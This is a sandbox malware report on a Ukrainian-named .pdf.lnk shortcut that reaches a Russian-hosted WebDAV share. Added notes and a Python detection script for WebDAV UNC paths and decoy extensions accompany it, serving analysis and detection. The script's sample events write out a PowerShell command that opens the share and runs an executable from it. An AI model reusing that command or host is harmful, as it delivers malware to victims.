Source: explorer.exe, 00000003.00000003.1725707837.0000000004909000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1721900064.0000000004909000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2975792224.0000000004906000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Progmanid
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation (4 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (7 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation (6 entries)
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation (4 entries)
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation (3 entries)
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation (2 entries)

Stealing of Sensitive Information

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: \\77.105.161.194@80\file\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: \\77.105.161.194@80\file
Source: C:\Windows\explorer.exe | File opened: \\77.105.161.194@80\file

Note on the path: \\host@port\share is the UNC syntax that the Windows WebDAV Mini-Redirector maps to http://host:port/share, so these "File opened" events are HTTP requests to 77.105.161.194 on port 80 (the same http://77.105.161.194/ strings the URL list below recovers from explorer.exe memory), not SMB share access. Nothing on this page shows what, if anything, was read back; the share is opened by both the PowerShell host and the explorer.exe instance it spawned.
MITRE ATT&CK matrix. A number in front of a technique name is the report's own marker for a technique observed in this analysis; unmarked cells are the matrix's default entries.

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 PowerShell | 1 DLL Side-Loading | 112 Process Injection | 111 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | 1 Non-Application Layer Protocol | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 141 Virtualization/Sandbox Evasion | LSASS Memory | 121 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 112 Process Injection | Security Account Manager | 12 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 141 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 21 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Source | Detection | Scanner | Label
#U0414#U043e#U043a#U0443#U043c#U0435#U043d#U0442#U0438.pdf.lnk (the #Uxxxx escapes decode to Документи.pdf.lnk, Ukrainian for "Documents") | 24% | ReversingLabs | Shortcut.Trojan.Generic
No Antivirus matches
No Antivirus matches
No Antivirus matches
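Two artefacts on this page are worth turning into detection logic: the \\host@port\share WebDAV UNC syntax in the "File opened" lines above, and the #Uxxxx-escaped, double-extension sample name in the scanner table. The Python below is an added example for this write-up, not code from the Joe Sandbox report, from the sample, or from its author. The mapping of \\host@port\share to http://host:port/share (and @SSL to https) is the documented Windows WebDAV redirector behaviour; the function names, the DOCUMENT_EXTS list, the severity wording and the three process-creation records (constructed here to mirror the report's process tree) are this example's own assumptions.

```python
import re
from dataclasses import dataclass

# --- 1. Joe Sandbox file-name escapes ---------------------------------------
# The report writes non-ASCII characters of the sample name as "#Uxxxx"
# (one escape per UTF-16 code unit), e.g. "#U0414#U043e...pdf.lnk".
_JOE_ESCAPE = re.compile(r"#U([0-9A-Fa-f]{4})")

def decode_joe_name(name: str) -> str:
    """Return the original Unicode file name behind Joe Sandbox's #Uxxxx escapes."""
    return _JOE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), name)

# Extensions a user expects to open a document, not a shortcut (assumed list).
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "txt", "jpg", "png"}

def has_decoy_double_extension(name: str) -> bool:
    """True for 'Документи.pdf.lnk'-style names: a document extension in front of .lnk."""
    parts = name.lower().rsplit(".", 2)
    return len(parts) == 3 and parts[2] == "lnk" and parts[1] in DOCUMENT_EXTS

def classify_sample_name(joe_name: str) -> dict:
    decoded = decode_joe_name(joe_name)
    return {"decoded": decoded, "decoy_double_extension": has_decoy_double_extension(decoded)}

# --- 2. WebDAV UNC paths -----------------------------------------------------
# The Windows WebDAV Mini-Redirector accepts UNC paths of the form
#   \\host@port\share\...       -> http://host:port/share/...
#   \\host@SSL\share\...        -> https://host/share/...
#   \\host@SSL@port\share\...   -> https://host:port/share/...
# A UNC path without "@" is ordinary SMB and is deliberately ignored here.
_WEBDAV_UNC = re.compile(
    r"\\\\(?P<host>[\w.\-]+)(?P<ssl>@SSL)?(?:@(?P<port>\d{1,5}))?\\(?P<path>[^\s'\";]*)",
    re.IGNORECASE,
)
_IPV4 = re.compile(r"(?:\d{1,3}\.){3}\d{1,3}")

@dataclass
class WebDavRef:
    host: str
    port: int
    scheme: str
    path: str  # share and file part, backslash-separated, no leading/trailing "\"

    def url(self) -> str:
        """The HTTP(S) URL the redirector will actually request for this path."""
        default = 443 if self.scheme == "https" else 80
        hostport = self.host if self.port == default else f"{self.host}:{self.port}"
        return f"{self.scheme}://{hostport}/{self.path.replace(chr(92), '/')}"

def find_webdav_refs(cmdline: str) -> list[WebDavRef]:
    """Extract every WebDAV-over-HTTP UNC reference from a command line."""
    refs = []
    for m in _WEBDAV_UNC.finditer(cmdline):
        if not (m.group("ssl") or m.group("port")):
            continue  # plain \\server\share: SMB, not WebDAV
        scheme = "https" if m.group("ssl") else "http"
        port = int(m.group("port")) if m.group("port") else (443 if scheme == "https" else 80)
        refs.append(WebDavRef(m.group("host"), port, scheme, m.group("path").strip("\\")))
    return refs

# --- 3. Triage of process-creation events ------------------------------------
def assess_process_event(image: str, cmdline: str) -> list[str]:
    """Findings for one process-creation record (Sysmon event 1 / Security 4688 style)."""
    findings = []
    exe = image.rsplit("\\", 1)[-1].lower()
    refs = find_webdav_refs(cmdline)
    for r in refs:
        if _IPV4.fullmatch(r.host):
            findings.append(f"{exe}: WebDAV share addressed by raw IP: {r.url()}")
        if r.path.lower().endswith(".exe"):
            findings.append(f"{exe}: executable run directly from a WebDAV share: {r.url()}")
    if exe == "powershell.exe" and refs and re.search(r"stop-process\s+-name\s+explorer", cmdline, re.I):
        findings.append("powershell.exe: opens the share in explorer, then kills explorer")
    return findings

# Constructed records mirroring the report's process tree (not taken from a real log).
SAMPLE_EVENTS = [
    ("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -c '
     '"explorer \'\\\\77.105.161.194@80\\file\\\'"; Start-Sleep -Seconds 1; '
     'Stop-Process -Name explorer; \\\\77.105.161.194@80\\file\\6706e721f2c06.exe'),
    ("C:\\Windows\\explorer.exe", '"C:\\Windows\\explorer.exe" \\\\77.105.161.194@80\\file\\'),
    ("C:\\Windows\\explorer.exe", '"C:\\Windows\\explorer.exe" \\\\fileserver\\public\\'),  # SMB, no finding
]

if __name__ == "__main__":
    print(classify_sample_name("#U0414#U043e#U043a#U0443#U043c#U0435#U043d#U0442#U0438.pdf.lnk"))
    for image, cmdline in SAMPLE_EVENTS:
        for finding in assess_process_event(image, cmdline):
            print(finding)
```

Run stand-alone it decodes the sample name to Документи.pdf.lnk, flags the .pdf.lnk decoy, and reports four findings for the PowerShell record (two raw-IP WebDAV references, an executable launched straight off the share, and the explorer kill), one for the explorer.exe record and none for the plain SMB path. The WebDAV-only filter matters in practice: \\server\share paths are everywhere in enterprise command lines, whereas \\ip@port\ paths are rare outside this kind of tradecraft.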
Source | Detection | Scanner | Label
http://77.105.161.194/) | 0% | Avira URL Cloud | safe
http://77.105.161.194/i | 0% | Avira URL Cloud | safe
http://77.105.161.194/ | 0% | Avira URL Cloud | safe
http://77.105.161.194/% | 0% | Avira URL Cloud | safe
http://77.105.161.194:80/ | 0% | Avira URL Cloud | safe
https://word.office.com( | 0% | Avira URL Cloud | safe
https://powerpoint.office.come | 0% | Avira URL Cloud | safe

The trailing ")", "i", "%", "(" and "e" are adjacent bytes picked up by the memory-string extractor, not part of the URLs. Treat the "safe" verdicts for the bare-IP HTTP URLs with caution: a URL reputation service has little to say about an IP-literal path that was first seen here, and the same IP is rated malicious in the IP table below with prior stealer context.
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.msn.com | unknown | unknown | false | - | high
URLs recovered from memory dumps and dropped files. Memory-dump sources are abbreviated with the keys below; every dump name keeps the report's process index (00000002 is the explorer.exe instance launched by the PowerShell command, 00000003 a second explorer.exe instance, 00000004 svchost.exe). All 77.105.161.194 strings come from process 00000002; everything else comes from process 00000003, from svchost.exe or from the BITS database files and is rated "high" reputation by the report.

[A] explorer.exe, 00000002.00000002.1709940016.00000000011F9000.00000004.00000020.00020000.00000000.sdmp
[B] explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmp
[C] explorer.exe, eight dumps of region 00000000087C0000 (suffix .00000004.00000020.00020000.00000000.sdmp): 00000003.00000003.1770312521, 00000003.00000003.1767052707, 00000003.00000003.3817790448, 00000003.00000002.4134236679, 00000003.00000003.1775141662, 00000003.00000003.2973453870, 00000003.00000003.1768180926, 00000003.00000003.1769205502
[D] explorer.exe, seven dumps of region 000000000882B000 (same suffix): 00000003.00000003.3817790448, 00000003.00000003.1770312521, 00000003.00000003.2973453870, 00000003.00000003.1767052707, 00000003.00000003.1775141662, 00000003.00000002.4134236679, 00000003.00000003.1768180926
[E] explorer.exe, seven dumps of region 000000000887E000 (same suffix): 00000003.00000003.1770312521, 00000003.00000003.1771280620, 00000003.00000003.1768583338, 00000003.00000003.1774936994, 00000003.00000003.1767052707, 00000003.00000003.1782359564, 00000003.00000003.1767560781
[F] explorer.exe, three dumps of region 00000000088D6000 (same suffix): 00000003.00000003.3817790448, 00000003.00000002.4134236679, 00000003.00000003.2973453870
[G] explorer.exe, four dumps of region 00000000088D6000 (same suffix): 00000003.00000003.1767052707, 00000003.00000003.1769205502, 00000003.00000003.1774936994, 00000003.00000003.1775834386
[H] explorer.exe, 00000003.00000002.4132522253.0000000004C7C000.00000004.00000020.00020000.00000000.sdmp
[S1] svchost.exe, 00000004.00000003.1722938583.00000284B06C2000.00000004.00000800.00020000.00000000.sdmp
[S2] svchost.exe, 00000004.00000002.3389637968.00000284B0400000.00000004.00000020.00020000.00000000.sdmp

Name | Source | Malicious | Antivirus Detection | Reputation
https://api.msn.com/v1/news/Feed/Windows? | [C] | false | - | high
http://schemas.mi | [F] | false | - | high
https://api.msn.com/1$1 | [D] | false | - | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | [B] | false | - | high
http://77.105.161.194/% | [A] | false | Avira URL Cloud: safe | unknown
https://api.msn.com:443/v1/news/Feed/Windows? | [H], [B] | false | - | high
https://g.live.com/odclientsettings/ProdV2.C: | edb.log.4.dr | false | - | high
https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re- | [B] | false | - | high
https://excel.office.com | [E] | false | - | high
http://77.105.161.194/) | [A] | false | Avira URL Cloud: safe | unknown
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we | [B] | false | - | high
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/ | [B] | false | - | high
https://aka.ms/odirm | [B] | false | - | high
https://g.live.com/odclientsettings/Prod.C: | edb.log.4.dr | false | - | high
https://g.live.com/odclientsettings/ProdV2 | edb.log.4.dr | false | - | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY | [B] | false | - | high
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew | [B] | false | - | high
https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi | [B] | false | - | high
https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc | [B] | false | - | high
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1 | [B] | false | - | high
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg | [B] | false | - | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark | [B] | false | - | high
https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A | [B] | false | - | high
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6 | [S1], qmgr.db.4.dr, edb.log.4.dr | false | - | high
http://77.105.161.194/ | [A] | false | Avira URL Cloud: safe | unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg | [B] | false | - | high
https://powerpoint.office.come | [G] | false | Avira URL Cloud: safe | unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | [B] | false | - | high
https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent | [B] | false | - | high
http://77.105.161.194:80/ | [A] | false | Avira URL Cloud: safe | unknown
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win | [B] | false | - | high
http://crl.ver) | [S2] | false | - | high
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | [B] | false | - | high
http://77.105.161.194/i | [A] | false | Avira URL Cloud: safe | unknown
http://schemas.micr | [F] | false | - | high
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow- | [B] | false | - | high
https://outlook.com | [E] | false | - | high
https://aka.ms/Vh5j3k | [B] | false | - | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu | [B] | false | - | high
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg | [B] | false | - | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark | [B] | false | - | high
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96 | [S1], edb.log.4.dr | false | - | high
https://www.rd.com/list/polite-habits-campers-dislike/ | [B] | false | - | high
https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar | [B] | false | - | high
https://api.msn.com/ | [D] | false | - | high
https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d | [B] | false | - | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark | [B] | false | - | high
https://www.msn.com:443/en-us/feed | [B] | false | - | high
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe | [B] | false | - | high
https://word.office.com( | [E] | false | Avira URL Cloud: safe | unknown
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at | [B] | false | - | high
https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of | [B] | false | - | high
IP | Domain | Country | ASN | ASN Name | Malicious
77.105.161.194 | unknown | Russian Federation | 43176 | ICOMF-ASRU | true

Private IPs: 127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1560046
Start date and time: 2024-11-21 10:50:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 21s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: #U0414#U043e#U043a#U0443#U043c#U0435#U043d#U0442#U0438.pdf.lnk (decoded: Документи.pdf.lnk)
renamed because original name is a hash value
Original Sample Name: .pdf.lnk
Detection: MAL
Classification: mal80.spyw.evad.winLNK@6/13@1/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
                                                                                              Cookbook Comments:
                                                                                              • Found application associated with file extension: .lnk
                                                                                              • Override analysis time to 240s for sample based on specific behavior
                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, SearchApp.exe, ShellExperienceHost.exe, WMIADAP.exe, conhost.exe, StartMenuExperienceHost.exe, TextInputHost.exe, mobsync.exe
                                                                                              • Excluded IPs from analysis (whitelisted): 204.79.197.203, 2.19.244.127
                                                                                              • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, a-0003.a-msedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, r.bing.com, prod.fs.microsoft.com.akadns.net, api-msn-com.a-0003.a-msedge.net
                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                              • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                              • Report size getting too big, too many NtOpenKey calls found.
                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                              • VT rate limit hit for: #U0414#U043e#U043a#U0443#U043c#U0435#U043d#U0442#U0438.pdf.lnk
Time | Type | Description
04:51:00 | API Interceptor | 23x Sleep call for process: powershell.exe modified
04:51:02 | API Interceptor | 1995x Sleep call for process: explorer.exe modified
04:51:03 | API Interceptor | 3x Sleep call for process: svchost.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
77.105.161.194 | bomb.exe | malicious | Amadey, Go Injector, LummaC Stealer, Phorpiex, PureLog Stealer, Stealc, Vidar
                                                                                                No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ICOMF-ASRU | bomb.exe | malicious | Amadey, Go Injector, LummaC Stealer, Phorpiex, PureLog Stealer, Stealc, Vidar | 77.105.161.194
ICOMF-ASRU | nJohIBtNm5.exe | malicious | LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLine | 77.105.164.86
ICOMF-ASRU | KKv1n1E6k9.exe | malicious | Stealc, Vidar | 77.105.164.86
ICOMF-ASRU | SecuriteInfo.com.Trojan.Inject5.8572.27596.15929.exe | malicious | Unknown | 77.105.164.24
ICOMF-ASRU | file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, Stealc | 77.105.164.24
ICOMF-ASRU | file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz | 77.105.164.24
ICOMF-ASRU | SecuriteInfo.com.Win64.MalwareX-gen.21442.4076.exe | malicious | Unknown | 77.105.172.225
ICOMF-ASRU | SecuriteInfo.com.Win64.MalwareX-gen.21442.4076.exe | malicious | Unknown | 77.105.172.225
ICOMF-ASRU | gobEmOm5sr.exe | malicious | LummaC, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, Xmrig | 77.105.164.24
ICOMF-ASRU | FileApp.exe | malicious | LummaC, PureLog Stealer, RedLine, Stealc, Vidar, Xmrig, zgRAT | 77.105.164.24
                                                                                                No context
                                                                                                No context
                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):8192
                                                                                                Entropy (8bit):0.363788168458258
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:6xPoaaD0JOCEfMuaaD0JOCEfMKQmDNOxPoaaD0JOCEfMuaaD0JOCEfMKQmDN:1aaD0JcaaD0JwQQbaaD0JcaaD0JwQQ
                                                                                                MD5:0E72F896C84F1457C62C0E20338FAC0D
                                                                                                SHA1:9C071CC3D15E5BD8BF603391AE447202BD9F8537
                                                                                                SHA-256:686DC879EA8690C42D3D5D10D0148AE7110FA4D8DCCBF957FB8E41EE3D4A42B3
                                                                                                SHA-512:AAA5BE088708DABC2EC9A7A6632BDF5700BE719D3F72B732BD2DFD1A3CFDD5C8884BFA4951DB0C499AF423EC30B14A49A30FBB831D1B0A880FE10053043A4251
                                                                                                Malicious:false
                                                                                                Reputation:moderate, very likely benign file
Preview: (binary data, omitted)
                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1310720
                                                                                                Entropy (8bit):1.3107998378881938
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrz:KooCEYhgYEL0In
                                                                                                MD5:E45EA5A890466F134EB2FD1BE2D43A7E
                                                                                                SHA1:932B1BAD9C9EFD757DCC0380EA55B34914B3F448
                                                                                                SHA-256:1A046ED163FADCCA74C866488DD960374546496F7C558DEF57CCE9B8C60D1ECF
                                                                                                SHA-512:B24AF5B33A5FE9AE11416BB4F1B4E30A6D06CE32EA92DF320242690B4F377FD1FEEF64F84DAE08F6C4F49DB087D9C1C7D7AE966D95E9ED10052F9CD827F22565
                                                                                                Malicious:false
                                                                                                Reputation:low
Preview: (binary data, omitted)
                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x0e76ae96, page size 16384, Windows version 10.0
                                                                                                Category:dropped
                                                                                                Size (bytes):1310720
                                                                                                Entropy (8bit):0.4222199465703393
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:vSB2ESB2SSjlK/uedMrSU0OrsJzvqYkr3g16f2UPkLk+ku4/Iw4KKazAkUk1k2DO:vazag03A2UrzJDO
                                                                                                MD5:2C7135A43F1C606651433CFF46558F2A
                                                                                                SHA1:20E42A88B7D180D32D37C2BAC5F981217C239347
                                                                                                SHA-256:D3E70A8593DA161A54149F8705B69692FEF5A24066CC2D91A73ADC7D560BB7AA
                                                                                                SHA-512:A5E9A12F77C8A6435CEB5BF787A22E3521E4FD8AC93B46FE8F76801841EC552CE340B2DE442F5119D20B4CAC21927F8A7B5B02B5F2270C4D881368852DD4E5CA
                                                                                                Malicious:false
                                                                                                Reputation:low
Preview: (binary data, omitted)
                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):16384
                                                                                                Entropy (8bit):0.07954526464869084
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:nAClWetYeW9s9jshWAw4IZ7llOE/tlnl+/rTc:xlz+s9jshGnhpMP
                                                                                                MD5:8E6373AF779F98869CE2A4B76E964039
                                                                                                SHA1:14FDE00550DF51DB8597D3ADE14479D08F4CAA63
                                                                                                SHA-256:5C34DE6716F6F3ECB0A321F54EB359E070B1322A65A647EB94D602714832157D
                                                                                                SHA-512:D6DFA939D9F7E142ABBE00F10B71DF29E024306748BAC0A5B46BC5AE278B879556E5303DD7DCE450B06DB31A77F4BFAE5FA3E54BC736964CC11755927B31EB5C
                                                                                                Malicious:false
                                                                                                Reputation:low
Preview: (binary data, omitted)
                                                                                                Process:C:\Windows\explorer.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):109536
                                                                                                Entropy (8bit):4.009392253694065
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:bfkRriQPsjKFh3iLGpnoPbFAVKwJCCNor:bfkRriQPsjah3iTbFA6/
                                                                                                MD5:4EC13BA68C6A26057AFB1C979E1F73B2
                                                                                                SHA1:788B827AB23E56A1EB3BABBFDF28EBB6B429C531
                                                                                                SHA-256:352D1EA4157A098A08D60B670FB57A22F556FA44B972ADB2979CCE9BE5304E95
                                                                                                SHA-512:96FB31967F7F6782CA0216F3CFFAA26C12E8E59B8435BC7267EE38AB13587F7475DA084B028FD584C19526C92C5BB4AAF1082F5D5D2AF6505241FF966BE0BB5C
                                                                                                Malicious:false
Preview: (binary data, omitted)
                                                                                                Process:C:\Windows\explorer.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):109536
                                                                                                Entropy (8bit):4.010090344591664
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:WfkzriQPsj+zh3iLGpnuFbFcVK+JCYNor:WfkzriQPsjsh3ijbFcEZ
                                                                                                MD5:D0B832D60E192A1CB624BDCF78189615
                                                                                                SHA1:1970156CFF0CBCC2EBA238166699D12BD3D91B2D
                                                                                                SHA-256:593BB7ADD84D8C74CE70EC4122C00628277EC3A1A6CD83C98FEE7CAA52EC1493
                                                                                                SHA-512:A0FA1B770C6C86036577360E1C898AD56651AC5FDFF018569CB34FADA7F406CCE12467F12902FDFA9ADC5D1AA2046303577976E3CBAFF4068D331ED045F82399
                                                                                                Malicious:false
Preview: (binary data, omitted)
                                                                                                Process:C:\Windows\explorer.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):858
                                                                                                Entropy (8bit):5.184327297552669
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Yzc25gHu9Ul9kC3c2TOFgHt0drc6hE10g:YzD5Mu9m9zDiWt0drcAESg
                                                                                                MD5:D1940DCB039A711EB608CDB9FF2437F0
                                                                                                SHA1:10D343452B322DF278E9779FA46ABDE4D27E9A56
                                                                                                SHA-256:8716EB5E9536E3B96CE491A819BEFCF9894682D319C0BD40FA1561D09F11ABC4
                                                                                                SHA-512:9D147D3916AA1AA3939A0D34A39DC001DA764EE0CAE31640098133FCCD10DA70F76CE9C1192C8131F999EA9CDE6AE5FF6B03E6533B747390A812BE4E7A1951C9
                                                                                                Malicious:false
                                                                                                Preview:{"serviceContext":{"serviceActivityId":"a5cf2e72-2cd9-417f-80ba-4b7a61cca92e","responseCreationDateTime":"0001-01-01T00:00:00","debugId":"a5cf2e72-2cd9-417f-80ba-4b7a61cca92e|2024-11-21T09:51:08.3683083Z|fabric_msn|EUS2-A|News_445","tier":"\u0000","clientActivityId":"694BFF47-8BBD-4F36-B0ED-39020CC0ECFA"},"expirationDateTime":"0001-01-01T00:00:00","showBadge":false,"settings":{"refreshIntervalMinutes":0,"feedEnabled":true,"evolvedNotificationLifecycleEnabled":false,"showBadgeOnRotationsForEvolvedNotificationLifecycle":false,"webView2Enabled":false,"webView2EnabledV1":false,"windowsSuppressClientRace":false,"flyoutV2EndpointEnabled":false,"showAnimation":false,"useTallerFlyoutSize":false,"useDynamicHeight":false,"useWiderFlyoutSize":false,"reclaimEnabled":false,"isPreviewDurationsEnabled":false,"1SlockscreenContentEnabled":true},"isPartial":false}
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):64
                                                                                                Entropy (8bit):1.1628158735648508
                                                                                                Encrypted:false
